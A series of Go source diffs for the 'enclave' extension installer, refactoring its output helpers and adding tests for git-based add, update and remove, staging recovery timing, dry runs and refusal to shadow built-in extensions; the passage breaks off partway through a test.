@@ -304,14 +309,14 @@ func applyPlan(env Env, req Request, plan installPlan, stage *staging) (ActionRe
 	// extension has to say, warnings and failures included, lands inside its
 	// own block rather than between the previous extension's block and this
 	// one's.
-	env.section(env.Style, plan.Name, fmt.Sprintf("%s @ %s", req.Kind.Label(), ShortCommit(plan.Commit)))
+	env.section(plan.Name, fmt.Sprintf("%s @ %s", req.Kind.Label(), ShortCommit(plan.Commit)))
 
 	warnings, err := validateStaged(env, stage, plan.Name)
 	if err != nil {
 		return ActionResult{}, err
 	}
 	for _, warning := range warnings {
-		env.outcome(env.Style, markWarn, logx.ColorYellow, "%s", warning)
+		env.outcome(markWarn, logx.ColorYellow, "%s", warning)
 	}
 	if len(warnings) > 0 {
 		_, _ = fmt.Fprintln(env.narrate())
@@ -340,7 +345,7 @@ func applyPlan(env Env, req Request, plan installPlan, stage *staging) (ActionRe
 	}
 
 	if req.DryRun {
-		env.outcome(env.Style, markInfo, logx.ColorCyan, "dry run: would be written to %s", target)
+		env.outcome(markInfo, logx.ColorCyan, "dry run: would be written to %s", target)
 		return ActionResult{Name: plan.Name, Action: ActionSkipped, Commit: plan.Commit, Path: target}, nil
 	}
 	if req.Interactive {
@@ -384,7 +389,7 @@ func applyPlan(env Env, req Request, plan installPlan, stage *staging) (ActionRe
 		return ActionResult{}, err
 	}
 
-	env.outcome(env.Style, markOK, logx.ColorGreen, "%s at %s", plan.Action, installedPath)
+	env.outcome(markOK, logx.ColorGreen, "%s at %s", plan.Action, installedPath)
 	printPostInstallHints(env, req.Kind, plan.Name, caps, contentChanged)
 	return ActionResult{Name: plan.Name, Action: plan.Action, Commit: plan.Commit, Path: installedPath, Warnings: warnings}, nil
 }
@@ -418,13 +423,13 @@ func renderUpdate(env Env, changedFiles []changedFile, before capabilities, afte
 // content rebuilds nothing and must not say otherwise.
 func printPostInstallHints(env Env, kind model.ExtensionKind, name string, caps capabilities, contentChanged bool) {
 	if contentChanged {
-		env.note(env.Style, "the next run rebuilds the image")
+		env.note("the next run rebuilds the image")
 	}
 	if kind != model.KindFeature {
 		return
 	}
 	if caps.Spec.DefaultEnabled != nil && !*caps.Spec.DefaultEnabled {
-		env.note(env.Style, "enable it with: enclave --features +%s", name)
+		env.note("enable it with: enclave --features +%s", name)
 	}
 }
 

--- a/internal/extinstall/install_git_test.go
+++ b/internal/extinstall/install_git_test.go
@@ -1,0 +1,195 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package extinstall
+
+import (
+	"context"
+	"os"
+	"path/filepath"
+	"strings"
+	"testing"
+
+	"enclave/internal/model"
+)
+
+// TestUpdateSharesOneCheckoutAgainstRealGit covers what the fake fetcher
+// cannot: several extensions from one repository at one ref are updated from a
+// single fetched checkout, so each of them materializes its own directories
+// out of a working tree another extension already materialized from.
+func TestUpdateSharesOneCheckoutAgainstRealGit(t *testing.T) {
+	specFor := func(name string, description string) string {
+		return "schemaVersion: \"1\"\nkind: mixin\nname: " + name + "\ndescription: " + description + "\n"
+	}
+	repo := fixtureRepo(t, true, map[string]string{
+		"extensions/features/alpha/spec.yaml":  specFor("alpha", "v1"),
+		"extensions/features/alpha/install.sh": "#!/bin/sh\necho alpha\n",
+		"extensions/features/beta/spec.yaml":   specFor("beta", "v1"),
+		"extensions/features/beta/install.sh":  "#!/bin/sh\necho beta\n",
+		"website/large.txt":                    "not an extension\n",
+	})
+	fetcher, err := NewGitFetcher()
+	if err != nil {
+		t.Skipf("git fetcher unavailable: %v", err)
+	}
+	env, _ := testEnv(t, fetcher, "")
+
+	if _, err := Add(context.Background(), env, Request{Kind: model.KindFeature, Op: OpAdd, Source: repo, All: true, Yes: true}); err != nil {
+		t.Fatalf("Add --all: %v", err)
+	}
+
+	for _, name := range []string{"alpha", "beta"} {
+		writeFixture(t, filepath.Join(repo, "extensions", "features", name, "spec.yaml"), specFor(name, "v2"), 0o644)
+	}
+	runGitFixture(t, repo, "add", "-A")
+	runGitFixture(t, repo, "commit", "-qm", "second")
+
+	results, err := Update(context.Background(), env, Request{Kind: model.KindFeature, Op: OpUpdate, Yes: true})
+	if err != nil {
+		t.Fatalf("Update: %v", err)
+	}
+	if len(results) != 2 {
+		t.Fatalf("results = %s, want both extensions updated", fmtResults(results))
+	}
+	for _, result := range results {
+		if result.Action != ActionUpdated {
+			t.Fatalf("results = %s, want both extensions updated", fmtResults(results))
+		}
+	}
+	for _, name := range []string{"alpha", "beta"} {
+		installed := filepath.Join(env.Paths.UserFeaturesDir, name)
+		content, readErr := os.ReadFile(filepath.Join(installed, "spec.yaml"))
+		if readErr != nil {
+			t.Fatalf("read %s spec: %v", name, readErr)
+		}
+		if !strings.Contains(string(content), "v2") {
+			t.Fatalf("%s was not updated:\n%s", name, content)
+		}
+		if _, statErr := os.Stat(filepath.Join(installed, "install.sh")); statErr != nil {
+			t.Fatalf("%s install.sh missing after the shared update: %v", name, statErr)
+		}
+		if _, statErr := os.Stat(filepath.Join(installed, "website")); !os.IsNotExist(statErr) {
+			t.Fatalf("%s picked up unrelated repository content", name)
+		}
+	}
+}
+
+// TestAddRootExtensionKeepsItsSubdirectoriesAgainstRealGit covers a repository
+// that is itself an extension and also holds nested ones. The root extension
+// owns the whole tree, so no set of subdirectories describes it and the
+// checkout must not be narrowed: a sparse cone naming only the nested
+// directories brings in the root's files but none of its subdirectories.
+func TestAddRootExtensionKeepsItsSubdirectoriesAgainstRealGit(t *testing.T) {
+	repo := fixtureRepo(t, true, map[string]string{
+		"spec.yaml":              "schemaVersion: \"1\"\nkind: mixin\nname: rootfeat\ndescription: Root\n",
+		"install.sh":             "#!/bin/sh\necho root\n",
+		"skills/demo/SKILL.md":   "# demo\n",
+		"nested/other/spec.yaml": "schemaVersion: \"1\"\nkind: mixin\nname: other\ndescription: Other\n",
+	})
+	fetcher, err := NewGitFetcher()
+	if err != nil {
+		t.Skipf("git fetcher unavailable: %v", err)
+	}
+	env, _ := testEnv(t, fetcher, "")
+
+	req := Request{Kind: model.KindFeature, Op: OpAdd, Source: repo, Names: []string{"rootfeat"}, Yes: true}
+	results, err := Add(context.Background(), env, req)
+	if err != nil {
+		t.Fatalf("Add: %v", err)
+	}
+	if len(results) != 1 || results[0].Action != ActionInstalled {
+		t.Fatalf("results = %s", fmtResults(results))
+	}
+	installed := filepath.Join(env.Paths.UserFeaturesDir, "rootfeat")
+	for _, rel := range []string{"install.sh", filepath.Join("skills", "demo", "SKILL.md")} {
+		if _, statErr := os.Stat(filepath.Join(installed, rel)); statErr != nil {
+			t.Fatalf("root extension installed without %s: %v", rel, statErr)
+		}
+	}
+}
+
+// TestAddUpdateRemoveAgainstRealGit exercises the whole lifecycle against an
+// actual git repository, so the fetcher's fallback ladder and the Update
+// ls-remote short-circuit are covered by more than a fake. It does not exercise
+// sparse checkout itself: Add/Update/Remove never hand the opened Repo back to
+// the caller, so this test has no legitimate way to inspect whether the git
+// working tree was materialized sparsely or in full. Sparse materialization
+// (the `sparse`/`blobless` bookkeeping and the absence of unrelated files in
+// the checkout itself) is covered directly in fetch_test.go by
+// TestGitFetcherMaterializeSubset and TestGitFetcherFallsBackWhenFilterUnsupported.
+func TestAddUpdateRemoveAgainstRealGit(t *testing.T) {
+	repo := fixtureRepo(t, true, map[string]string{
+		"extensions/features/demo/spec.yaml":  "schemaVersion: \"1\"\nkind: mixin\nname: demo\ndescription: Demo\n",
+		"extensions/features/demo/install.sh": "#!/bin/sh\necho demo\n",
+		"website/large.txt":                   "not an extension\n",
+	})
+	fetcher, err := NewGitFetcher()
+	if err != nil {
+		t.Skipf("git fetcher unavailable: %v", err)
+	}
+	env, _ := testEnv(t, fetcher, "")
+
+	req := Request{Kind: model.KindFeature, Op: OpAdd, Source: repo, Yes: true}
+	results, err := Add(context.Background(), env, req)
+	if err != nil {
+		t.Fatalf("Add: %v", err)
+	}
+	if len(results) != 1 || results[0].Action != ActionInstalled {
+		t.Fatalf("results = %s", fmtResults(results))
+	}
+	installed := filepath.Join(env.Paths.UserFeaturesDir, "demo")
+	if _, statErr := os.Stat(filepath.Join(installed, "install.sh")); statErr != nil {
+		t.Fatalf("install.sh missing: %v", statErr)
+	}
+	// This proves the installed layout is scoped to the selected extension
+	// directory (applyPlan/copyExtensionTree copy only plan.RepoDir), not that
+	// the git checkout itself was sparse; see the doc comment above.
+	if _, statErr := os.Stat(filepath.Join(installed, "website")); !os.IsNotExist(statErr) {
+		t.Fatal("unrelated repository content was installed")
+	}
+
+	// Nothing changed upstream: update must not rewrite anything.
+	updateResults, err := Update(context.Background(), env, Request{Kind: model.KindFeature, Op: OpUpdate, Yes: true})
+	if err != nil {
+		t.Fatalf("Update: %v", err)
+	}
+	if len(updateResults) != 1 || updateResults[0].Action != ActionUnchanged {
+		t.Fatalf("update results = %s", fmtResults(updateResults))
+	}
+
+	// Move the remote forward and update again.
+	writeFixture(t, filepath.Join(repo, "extensions", "features", "demo", "spec.yaml"),
+		"schemaVersion: \"1\"\nkind: mixin\nname: demo\ndescription: Demo v2\n", 0o644)
+	runGitFixture(t, repo, "add", "-A")
+	runGitFixture(t, repo, "commit", "-qm", "second")
+
+	updateResults, err = Update(context.Background(), env, Request{Kind: model.KindFeature, Op: OpUpdate, Yes: true})
+	if err != nil {
+		t.Fatalf("Update after upstream change: %v", err)
+	}
+	if len(updateResults) != 1 || updateResults[0].Action != ActionUpdated {
+		t.Fatalf("update results = %s", fmtResults(updateResults))
+	}
+	content, err := os.ReadFile(filepath.Join(installed, "spec.yaml"))
+	if err != nil {
+		t.Fatalf("read spec: %v", err)
+	}
+	if !strings.Contains(string(content), "Demo v2") {
+		t.Fatalf("spec was not updated:\n%s", content)
+	}
+
+	removeResults, err := Remove(context.Background(), env, Request{Kind: model.KindFeature, Op: OpRemove, Names: []string{"demo"}, Yes: true})
+	if err != nil {
+		t.Fatalf("Remove: %v", err)
+	}
+	if len(removeResults) != 1 || removeResults[0].Action != ActionRemoved {
+		t.Fatalf("remove results = %s", fmtResults(removeResults))
+	}
+	if _, statErr := os.Stat(installed); !os.IsNotExist(statErr) {
+		t.Fatal("extension survived removal")
+	}
+}

--- a/internal/extinstall/install_git_test.go
+++ b/internal/extinstall/install_git_test.go
@@ -32,7 +32,7 @@ func TestUpdateSharesOneCheckoutAgainstRealGit(t *testing.T) {
 		"extensions/features/beta/install.sh":  "#!/bin/sh\necho beta\n",
 		"website/large.txt":                    "not an extension\n",
 	})
-	fetcher, err := NewGitFetcher()
+	fetcher, err := NewGitFetcher(false)
 	if err != nil {
 		t.Skipf("git fetcher unavailable: %v", err)
 	}
@@ -90,7 +90,7 @@ func TestAddRootExtensionKeepsItsSubdirectoriesAgainstRealGit(t *testing.T) {
 		"skills/demo/SKILL.md":   "# demo\n",
 		"nested/other/spec.yaml": "schemaVersion: \"1\"\nkind: mixin\nname: other\ndescription: Other\n",
 	})
-	fetcher, err := NewGitFetcher()
+	fetcher, err := NewGitFetcher(false)
 	if err != nil {
 		t.Skipf("git fetcher unavailable: %v", err)
 	}
@@ -127,7 +127,7 @@ func TestAddUpdateRemoveAgainstRealGit(t *testing.T) {
 		"extensions/features/demo/install.sh": "#!/bin/sh\necho demo\n",
 		"website/large.txt":                   "not an extension\n",
 	})
-	fetcher, err := NewGitFetcher()
+	fetcher, err := NewGitFetcher(false)
 	if err != nil {
 		t.Skipf("git fetcher unavailable: %v", err)
 	}

--- a/internal/extinstall/install_test.go
+++ b/internal/extinstall/install_test.go
@@ -778,6 +778,53 @@ func TestStagingCommitStampFailureRestoresPreviousState(t *testing.T) {
 	}
 }
 
+// TestStagingCommitStartsReplacedRecoveryWindowAtSwap covers the recovery copy's
+// age: os.Rename carries the installed directory's mtime over, and sweepStale
+// stats nothing else, so without a refresh the copy of an extension installed
+// longer ago than staleAge is stale the moment it is created and the next add
+// or update deletes it before the documented window has run.
+func TestStagingCommitStartsReplacedRecoveryWindowAtSwap(t *testing.T) {
+	env, _ := testEnv(t, nil, "")
+	stage, err := newStaging(env, model.KindFeature, false)
+	if err != nil {
+		t.Fatalf("newStaging: %v", err)
+	}
+	existing := filepath.Join(env.Paths.UserFeaturesDir, "foo")
+	writeFixture(t, filepath.Join(existing, "marker.txt"), "old\n", 0o644)
+	ancient := env.now().Add(-30 * 24 * time.Hour)
+	if err := os.Chtimes(existing, ancient, ancient); err != nil {
+		t.Fatalf("Chtimes: %v", err)
+	}
+	writeFixture(t, filepath.Join(stage.extDir("foo"), "marker.txt"), "new\n", 0o644)
+
+	swept := true
+	if _, err := stage.commit(env, "foo", func(string) error {
+		// The recovery copy only exists while the stamp runs; commit deletes it
+		// on success.
+		entries, readErr := os.ReadDir(stage.kindDir)
+		if readErr != nil {
+			return readErr
+		}
+		for _, entry := range entries {
+			if !strings.HasPrefix(entry.Name(), replacedPrefix) {
+				continue
+			}
+			info, infoErr := entry.Info()
+			if infoErr != nil {
+				return infoErr
+			}
+			swept = env.now().Sub(info.ModTime()) >= staleAge
+		}
+		return nil
+	}); err != nil {
+		t.Fatalf("commit: %v", err)
+	}
+	if swept {
+		t.Fatalf("the %s recovery copy is already older than the %s window the next sweep enforces",
+			replacedPrefix, staleAge)
+	}
+}
+
 // TestSweepStaleRespectsTouch: a staging directory whose mtime was refreshed
 // (as applyPlan does around the confirmation prompt and the swap) must survive
 // a sweep even though its original mtime was old enough to be swept.

--- a/internal/extinstall/install_test.go
+++ b/internal/extinstall/install_test.go
@@ -1,0 +1,831 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package extinstall
+
+import (
+	"context"
+	"errors"
+	"fmt"
+	"io/fs"
+	"os"
+	"path/filepath"
+	"reflect"
+	"strconv"
+	"strings"
+	"testing"
+	"time"
+
+	"enclave/internal/model"
+)
+
+const fooFeatureSpec = "schemaVersion: \"1\"\nkind: mixin\nname: foo\ndescription: A test feature\n"
+
+func fooRepoFiles() map[string]string {
+	return map[string]string{
+		"extensions/features/foo/spec.yaml":  fooFeatureSpec,
+		"extensions/features/foo/install.sh": "#!/bin/sh\necho foo\n",
+		"README.md":                          "docs\n",
+	}
+}
+
+func addRequest(names ...string) Request {
+	return Request{Kind: model.KindFeature, Op: OpAdd, Source: "acme/kits", Names: names, Yes: true}
+}
+
+func TestAddInstallsDiscoveredFeature(t *testing.T) {
+	fetcher := newFakeFetcher(t, "a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0", fooRepoFiles())
+	env, _ := testEnv(t, fetcher, "")
+
+	results, err := Add(context.Background(), env, addRequest())
+	if err != nil {
+		t.Fatalf("Add: %v", err)
+	}
+	if len(results) != 1 || results[0].Action != ActionInstalled {
+		t.Fatalf("results = %s", fmtResults(results))
+	}
+
+	installed := filepath.Join(env.Paths.UserFeaturesDir, "foo")
+	if _, err := os.Stat(filepath.Join(installed, "spec.yaml")); err != nil {
+		t.Fatalf("spec not installed: %v", err)
+	}
+	origin, err := readOrigin(installed)
+	if err != nil || origin == nil {
+		t.Fatalf("readOrigin = %v, %v", origin, err)
+	}
+	if origin.Commit != fetcher.repo.commit || origin.Ref != "main" || origin.RefType != RefTypeBranch {
+		t.Fatalf("origin = %+v", *origin)
+	}
+	if origin.Subpath != "extensions/features/foo" {
+		t.Errorf("origin subpath = %q", origin.Subpath)
+	}
+	if origin.TreeHash == "" {
+		t.Error("origin has no tree hash")
+	}
+	modified, err := isLocallyModified(installed, *origin)
+	if err != nil || modified {
+		t.Fatalf("freshly installed extension reported modified=%v (%v)", modified, err)
+	}
+}
+
+func TestAddLeavesNoStagingDirectories(t *testing.T) {
+	fetcher := newFakeFetcher(t, "a1b2c3d4", fooRepoFiles())
+	env, _ := testEnv(t, fetcher, "")
+	if _, err := Add(context.Background(), env, addRequest()); err != nil {
+		t.Fatalf("Add: %v", err)
+	}
+
+	entries, err := os.ReadDir(env.Paths.UserFeaturesDir)
+	if err != nil {
+		t.Fatalf("ReadDir: %v", err)
+	}
+	for _, entry := range entries {
+		if strings.HasPrefix(entry.Name(), ".") {
+			t.Fatalf("staging leftover: %s", entry.Name())
+		}
+	}
+}
+
+func TestAddRejectsWrongKind(t *testing.T) {
+	fetcher := newFakeFetcher(t, "a1b2c3d4", fooRepoFiles())
+	env, _ := testEnv(t, fetcher, "")
+
+	req := addRequest()
+	req.Kind = model.KindTool
+	_, err := Add(context.Background(), env, req)
+	if err == nil {
+		t.Fatal("Add installed a mixin as a tool")
+	}
+	if !strings.Contains(err.Error(), "enclave features add") {
+		t.Fatalf("error does not name the right verb: %v", err)
+	}
+}
+
+func TestAddRequiresSelectionForMultipleCandidates(t *testing.T) {
+	files := fooRepoFiles()
+	files["extensions/features/bar/spec.yaml"] = "schemaVersion: \"1\"\nkind: mixin\nname: bar\n"
+	fetcher := newFakeFetcher(t, "a1b2c3d4", files)
+	env, _ := testEnv(t, fetcher, "")
+
+	// --yes with neither --all nor --name must not guess.
+	if _, err := Add(context.Background(), env, addRequest()); err == nil {
+		t.Fatal("Add installed everything without --all")
+	}
+
+	req := addRequest()
+	req.All = true
+	results, err := Add(context.Background(), env, req)
+	if err != nil {
+		t.Fatalf("Add --all: %v", err)
+	}
+	if len(results) != 2 {
+		t.Fatalf("results = %s, want two", fmtResults(results))
+	}
+
+	single := addRequest("bar")
+	single.Source = "acme/kits"
+	results, err = Add(context.Background(), env, single)
+	if err != nil {
+		t.Fatalf("Add --name: %v", err)
+	}
+	if len(results) != 1 || results[0].Name != "bar" {
+		t.Fatalf("results = %s", fmtResults(results))
+	}
+}
+
+func TestAddRefusesExistingDirectoryWithoutForce(t *testing.T) {
+	fetcher := newFakeFetcher(t, "a1b2c3d4", fooRepoFiles())
+	env, _ := testEnv(t, fetcher, "")
+	existing := filepath.Join(env.Paths.UserFeaturesDir, "foo")
+	writeFixture(t, filepath.Join(existing, "spec.yaml"), "schemaVersion: \"1\"\nkind: mixin\nname: foo\n", 0o644)
+	writeFixture(t, filepath.Join(existing, "hand-written.txt"), "mine\n", 0o644)
+
+	results, err := Add(context.Background(), env, addRequest())
+	if err == nil && !HasFailure(results) {
+		t.Fatalf("Add overwrote an unmanaged directory: %s", fmtResults(results))
+	}
+	if _, statErr := os.Stat(filepath.Join(existing, "hand-written.txt")); statErr != nil {
+		t.Fatalf("unmanaged content was destroyed: %v", statErr)
+	}
+
+	req := addRequest()
+	req.Force = true
+	results, err = Add(context.Background(), env, req)
+	if err != nil {
+		t.Fatalf("Add --force: %v", err)
+	}
+	if len(results) != 1 || results[0].Action != ActionInstalled {
+		t.Fatalf("results = %s", fmtResults(results))
+	}
+	origin, err := readOrigin(existing)
+	if err != nil || origin == nil {
+		t.Fatalf("forced install did not become managed: %v, %v", origin, err)
+	}
+}
+
+// TestAddRefusesShadowingBuiltinWithoutForce: a name that exists only as a
+// built-in (no user directory at all) must still require --force. The overlay
+// is per-file, so an untrusted source's install.sh would replace the
+// built-in's and then run at image build, possibly as root under needsRoot.
+func TestAddRefusesShadowingBuiltinWithoutForce(t *testing.T) {
+	fetcher := newFakeFetcher(t, "a1b2c3d4", fooRepoFiles())
+	env, _ := testEnv(t, fetcher, "")
+	builtinDir := filepath.Join(env.Paths.FeaturesDir, "foo")
+	writeFixture(t, filepath.Join(builtinDir, "spec.yaml"), fooFeatureSpec, 0o644)
+	writeFixture(t, filepath.Join(builtinDir, "install.sh"), "#!/bin/sh\necho builtin\n", 0o755)
+	builtinBefore := snapshotTree(t, builtinDir)
+
+	results, err := Add(context.Background(), env, addRequest())
+	if err == nil && !HasFailure(results) {
+		t.Fatalf("Add silently shadowed a built-in: %s", fmtResults(results))
+	}
+	message := ""
+	switch {
+	case err != nil:
+		message = err.Error()
+	case len(results) > 0:
+		message = results[0].Error
+	}
+	if !strings.Contains(message, "built-in") {
+		t.Fatalf("error does not say the install would shadow a built-in: %v", message)
+	}
+	if len(results) > 0 && results[0].Name != "foo" {
+		t.Fatalf("results = %s, want the refusal attributed to foo", fmtResults(results))
+	}
+	assertResultsDoNotNameExtensions(t, results)
+	if _, statErr := os.Stat(filepath.Join(env.Paths.UserFeaturesDir, "foo")); !os.IsNotExist(statErr) {
+		t.Fatalf("refused install still wrote a user directory: %v", statErr)
+	}
+	if diff := snapshotTree(t, builtinDir); len(diff) != len(builtinBefore) {
+		t.Fatalf("built-in files were touched by the refused install: before=%v after=%v", builtinBefore, diff)
+	}
+
+	req := addRequest()
+	req.Force = true
+	results, err = Add(context.Background(), env, req)
+	if err != nil {
+		t.Fatalf("Add --force: %v", err)
+	}
+	if len(results) != 1 || results[0].Action != ActionInstalled {
+		t.Fatalf("results = %s", fmtResults(results))
+	}
+	if _, statErr := os.Stat(filepath.Join(env.Paths.UserFeaturesDir, "foo", "spec.yaml")); statErr != nil {
+		t.Fatalf("forced install did not write the user overlay: %v", statErr)
+	}
+	if after := snapshotTree(t, builtinDir); !reflect.DeepEqual(builtinBefore, after) {
+		t.Fatalf("built-in files were touched by --force: before=%v after=%v", builtinBefore, after)
+	}
+}
+
+// TestAddOptInFeaturePrintsEnableHint covers the hint an opt-in feature needs:
+// installing it rebuilds the image, but it stays inactive until it is enabled.
+// The flag comes from the capabilities inspect already computed, so nothing
+// re-reads the installed spec to answer it.
+func TestAddOptInFeaturePrintsEnableHint(t *testing.T) {
+	optIn := map[string]string{
+		"extensions/features/optin/spec.yaml": "schemaVersion: \"1\"\nkind: mixin\nname: optin\ndefaultEnabled: false\n",
+	}
+	env, out := testEnv(t, newFakeFetcher(t, "a1b2c3d4", optIn), "")
+	if _, err := Add(context.Background(), env, addRequest()); err != nil {
+		t.Fatalf("Add: %v", err)
+	}
+	if !strings.Contains(out.String(), "enable it with: enclave --features +optin") {
+		t.Fatalf("opt-in feature install printed no enable hint:\n%s", out.String())
+	}
+
+	// A feature that is enabled by default must not be told to enable itself.
+	onByDefault, defaultOut := testEnv(t, newFakeFetcher(t, "a1b2c3d4", fooRepoFiles()), "")
+	if _, err := Add(context.Background(), onByDefault, addRequest()); err != nil {
+		t.Fatalf("Add: %v", err)
+	}
+	if strings.Contains(defaultOut.String(), "enable it with") {
+		t.Fatalf("default-on feature was told to enable itself:\n%s", defaultOut.String())
+	}
+}
+
+// TestAddAllKeepsValidationFailuresPerExtension pins the attribution of a
+// staged-validation failure when several extensions are installed in one run:
+// the invalid one fails, and every other selected extension is installed and
+// judged on its own content.
+func TestAddAllKeepsValidationFailuresPerExtension(t *testing.T) {
+	files := map[string]string{
+		// Same invalid port as TestAddValidationFailureWritesNothing: accepted
+		// by discovery, rejected by staged validation. "bad" sorts before
+		// "good", so it is staged first.
+		"extensions/features/bad/spec.yaml":  "schemaVersion: \"1\"\nkind: mixin\nname: bad\nports:\n  - container: 99999\n",
+		"extensions/features/good/spec.yaml": "schemaVersion: \"1\"\nkind: mixin\nname: good\n",
+	}
+	env, _ := testEnv(t, newFakeFetcher(t, "a1b2c3d4", files), "")
+	req := addRequest()
+	req.All = true
+
+	results, err := Add(context.Background(), env, req)
+	if err != nil {
+		t.Fatalf("Add --all: %v", err)
+	}
+	if len(results) != 2 {
+		t.Fatalf("results = %s, want one per selected extension", fmtResults(results))
+	}
+	byName := map[string]ActionResult{}
+	for _, result := range results {
+		byName[result.Name] = result
+	}
+	if byName["bad"].Action != ActionFailed {
+		t.Errorf("bad = %s, want the invalid extension to fail", byName["bad"].Action)
+	}
+	if !strings.Contains(byName["bad"].Error, "bad") {
+		t.Errorf("bad error = %q, want it to describe the invalid extension", byName["bad"].Error)
+	}
+	if byName["good"].Action != ActionInstalled {
+		t.Errorf("good = %s (%s), want the valid extension installed on its own merits",
+			byName["good"].Action, byName["good"].Error)
+	}
+	if _, statErr := os.Stat(filepath.Join(env.Paths.UserFeaturesDir, "good", "spec.yaml")); statErr != nil {
+		t.Errorf("valid extension was not installed: %v", statErr)
+	}
+	if _, statErr := os.Stat(filepath.Join(env.Paths.UserFeaturesDir, "bad")); !os.IsNotExist(statErr) {
+		t.Errorf("invalid extension was installed anyway (%v)", statErr)
+	}
+}
+
+// TestAddDryRunAllValidatesEachExtensionOnce is the cost regression test for
+// --all: nothing is committed on a dry run, so a staged copy left behind in
+// the shared staging root would make every extension re-validate all the ones
+// before it. Each warning must be reported exactly once.
+func TestAddDryRunAllValidatesEachExtensionOnce(t *testing.T) {
+	files := map[string]string{}
+	for _, name := range []string{"one", "two", "three"} {
+		dir := "extensions/features/" + name
+		files[dir+"/spec.yaml"] = "schemaVersion: \"1\"\nkind: mixin\nname: " + name + "\n"
+		// A user go/ directory is ignored by the build, which staged
+		// validation reports as a warning for this extension.
+		files[dir+"/go/handler.go"] = "package main\n"
+	}
+	env, out := testEnv(t, newFakeFetcher(t, "a1b2c3d4", files), "")
+	req := addRequest()
+	req.All = true
+	req.DryRun = true
+
+	results, err := Add(context.Background(), env, req)
+	if err != nil {
+		t.Fatalf("Add --all --dry-run: %v", err)
+	}
+	if len(results) != 3 {
+		t.Fatalf("results = %s, want one per extension", fmtResults(results))
+	}
+	for _, name := range []string{"one", "two", "three"} {
+		warning := fmt.Sprintf("feature %q: user go/ handlers are ignored", name)
+		if got := strings.Count(out.String(), warning); got != 1 {
+			t.Errorf("warning for %q reported %d times, want 1:\n%s", name, got, out.String())
+		}
+	}
+}
+
+func TestAddValidationFailureWritesNothing(t *testing.T) {
+	files := map[string]string{
+		// A container port outside 1-65535 parses fine (SummarizeSpecDir does
+		// not range-check it, so classify accepts the candidate), but
+		// LoadFeatureExtension's normalizePortConfigs rejects it. The failure
+		// must come from staged validation, not from discovery.
+		"extensions/features/foo/spec.yaml": "schemaVersion: \"1\"\nkind: mixin\nname: foo\nports:\n  - container: 99999\n",
+	}
+	fetcher := newFakeFetcher(t, "a1b2c3d4", files)
+	env, _ := testEnv(t, fetcher, "")
+
+	results, err := Add(context.Background(), env, addRequest())
+	if err == nil && !HasFailure(results) {
+		t.Fatalf("Add accepted an invalid spec: %s", fmtResults(results))
+	}
+	if _, statErr := os.Stat(filepath.Join(env.Paths.UserFeaturesDir, "foo")); !os.IsNotExist(statErr) {
+		t.Fatalf("invalid extension was installed anyway (%v)", statErr)
+	}
+}
+
+func TestAddDryRunWritesNothing(t *testing.T) {
+	fetcher := newFakeFetcher(t, "a1b2c3d4", fooRepoFiles())
+	env, out := testEnv(t, fetcher, "")
+	req := addRequest()
+	req.DryRun = true
+
+	if _, err := Add(context.Background(), env, req); err != nil {
+		t.Fatalf("Add --dry-run: %v", err)
+	}
+	if _, statErr := os.Stat(filepath.Join(env.Paths.UserFeaturesDir, "foo")); !os.IsNotExist(statErr) {
+		t.Fatal("--dry-run installed the extension")
+	}
+	if !strings.Contains(out.String(), "foo") {
+		t.Fatalf("--dry-run printed no summary:\n%s", out.String())
+	}
+}
+
+// TestAddDryRunDoesNotCreateTheDestination holds the documented promise that a
+// dry run never touches the destination down to the directory itself. Creating
+// the user extension root is a lasting side effect on a host that has never
+// installed one: config.HasUserExtensions reports true from then on, which
+// costs every later build its app-root fast path.
+func TestAddDryRunDoesNotCreateTheDestination(t *testing.T) {
+	fetcher := newFakeFetcher(t, "a1b2c3d4", fooRepoFiles())
+	env, _ := testEnv(t, fetcher, "")
+	if err := os.RemoveAll(env.Paths.UserExtensionsDir); err != nil {
+		t.Fatalf("clear the destination: %v", err)
+	}
+
+	req := addRequest()
+	req.DryRun = true
+	if _, err := Add(context.Background(), env, req); err != nil {
+		t.Fatalf("Add --dry-run: %v", err)
+	}
+	if _, statErr := os.Stat(env.Paths.UserExtensionsDir); !os.IsNotExist(statErr) {
+		t.Fatalf("--dry-run created the user extension root (stat err = %v)", statErr)
+	}
+}
+
+func TestAddDeclinedAtPromptWritesNothing(t *testing.T) {
+	fetcher := newFakeFetcher(t, "a1b2c3d4", fooRepoFiles())
+	env, _ := testEnv(t, fetcher, "n\n")
+	req := addRequest()
+	req.Yes = false
+	req.Interactive = true
+
+	results, err := Add(context.Background(), env, req)
+	if err == nil && !HasFailure(results) {
+		t.Fatalf("declining the prompt still succeeded: %s", fmtResults(results))
+	}
+	if _, statErr := os.Stat(filepath.Join(env.Paths.UserFeaturesDir, "foo")); !os.IsNotExist(statErr) {
+		t.Fatal("declined install wrote files")
+	}
+}
+
+func TestAddExplicitPathSkipsDiscovery(t *testing.T) {
+	files := fooRepoFiles()
+	files["extensions/features/bar/spec.yaml"] = "schemaVersion: \"1\"\nkind: mixin\nname: bar\n"
+	fetcher := newFakeFetcher(t, "a1b2c3d4", files)
+	env, _ := testEnv(t, fetcher, "")
+
+	req := addRequest()
+	req.Path = "extensions/features/bar"
+	results, err := Add(context.Background(), env, req)
+	if err != nil {
+		t.Fatalf("Add --path: %v", err)
+	}
+	if len(results) != 1 || results[0].Name != "bar" {
+		t.Fatalf("results = %s", fmtResults(results))
+	}
+}
+
+// TestAddRejectsNameCollisionAcrossDirectories covers two extensions in
+// different directories of one repository sharing a base name, distinguished
+// only by Dir. selectExtensions must not silently pick one over the other via
+// a byName map; Add must refuse the whole install, naming both directories,
+// regardless of --name/--all/prompt, and before anything is staged.
+func TestAddRejectsNameCollisionAcrossDirectories(t *testing.T) {
+	files := map[string]string{
+		"a/foo/spec.yaml": "schemaVersion: \"1\"\nkind: mixin\nname: foo\n",
+		"b/foo/spec.yaml": "schemaVersion: \"1\"\nkind: mixin\nname: foo\n",
+	}
+	fetcher := newFakeFetcher(t, "a1b2c3d4", files)
+	env, _ := testEnv(t, fetcher, "")
+
+	assertCollision := func(t *testing.T, req Request) {
+		t.Helper()
+		results, err := Add(context.Background(), env, req)
+		if err == nil {
